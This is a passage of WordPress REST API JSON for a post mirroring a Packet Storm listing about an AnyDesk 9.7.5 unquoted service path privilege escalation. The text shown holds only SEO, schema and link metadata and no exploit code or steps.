redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=63181","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-16T16:01:24&#8243;,&#8221;description&#8221;:&#8221;AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-16T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:223513&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n | # Title : AnyDesk v9.7.5 Unquoted Service Path...","og_url":"https:\/\/zero.redgem.net\/?p=63181","og_site_name":"zero redgem","article_published_time":"2026-06-16T11:46:35+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=63181#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=63181"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513","datePublished":"2026-06-16T11:46:35+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=63181"},"wordCount":1780,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=63181#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=63181","url":"https:\/\/zero.redgem.net\/?p=63181","name":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-16T11:46:35+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=63181#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=63181"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=63181#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path_PACKETSTORM:223513"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/63181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=63181"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/63181\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=63181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=63181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=63181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}